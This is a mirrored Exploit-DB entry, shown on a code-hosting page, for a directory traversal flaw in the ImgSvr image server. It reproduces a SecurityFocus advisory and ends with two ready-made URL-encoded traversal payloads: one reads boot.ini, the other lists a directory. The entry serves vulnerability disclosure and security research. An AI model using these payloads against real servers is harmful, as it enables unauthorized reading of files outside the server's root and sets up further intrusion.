bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/23909.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

11 lines
No EOL
628 B
Text
Raw Blame History

source: http://www.securityfocus.com/bid/10048/info
ImgSvr is prone to an issue that may allow an attacker to view files that reside outside of the server root directory. This issue occurs because the application fails to properly sanitize user-supplied URI data.
A successful exploit may allow a remote attacker to access sensitive information that may be used to launch further attacks against a vulnerable system.
To view a selected file:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini
To list a directory:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
Reference in a new issue View git blame Copy permalink